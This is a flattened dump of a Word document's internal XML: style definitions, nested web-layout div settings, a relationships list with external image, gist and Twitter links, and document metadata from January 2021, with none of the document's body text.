  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00254458"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00254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4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708999">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="116414239">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1701013057">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1091970266">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="452941420">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1979526316">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1384596178">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1647969661">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="883713212">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1790204295">
              <w:marLeft w:val="-188"/>
              <w:marRight w:val="-188"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="623267578">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1897667123">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="300"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="215823016">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="675768167">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="375"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="12" w:space="26" w:color="09889F"/>
                        <w:left w:val="single" w:sz="12" w:space="23" w:color="09889F"/>
                        <w:bottom w:val="single" w:sz="12" w:space="23" w:color="09889F"/>
                        <w:right w:val="single" w:sz="12" w:space="23" w:color="09889F"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1344741886">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="150"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="203839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292542">
          <w:marLeft w:val="-188"/>
          <w:marRight w:val="-188"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="8515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bp.blogspot.com/_2IvFH57W8Hc/TMiADkAI3fI/AAAAAAAAADI/fJW46dQPQTQ/s1600/exploit.jpg" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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st.github.com/caseysmithrc/0b40f1ec0340edd5efe54f1111bba325" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://3.bp.blogspot.com/_2IvFH57W8Hc/TMiDRKpCqQI/AAAAAAAAADc/J4TwneVKTwA/s1600/runoptions.jpg"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witter.com/subTee" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://4.bp.blogspot.com/_2IvFH57W8Hc/TMiBfKWX_9I/AAAAAAAAADY/UDzFXWLgrmE/s1600/download1.jpg" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/subTee" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://3.bp.blogspot.com/_2IvFH57W8Hc/TMiD2BNgPwI/AAAAAAAAADg/e7ZDcRkfXac/s1600/downloading.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11</Pages>
  <Words>2672</Words>
  <Characters>15232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2021-01-04T17:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-04T18:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>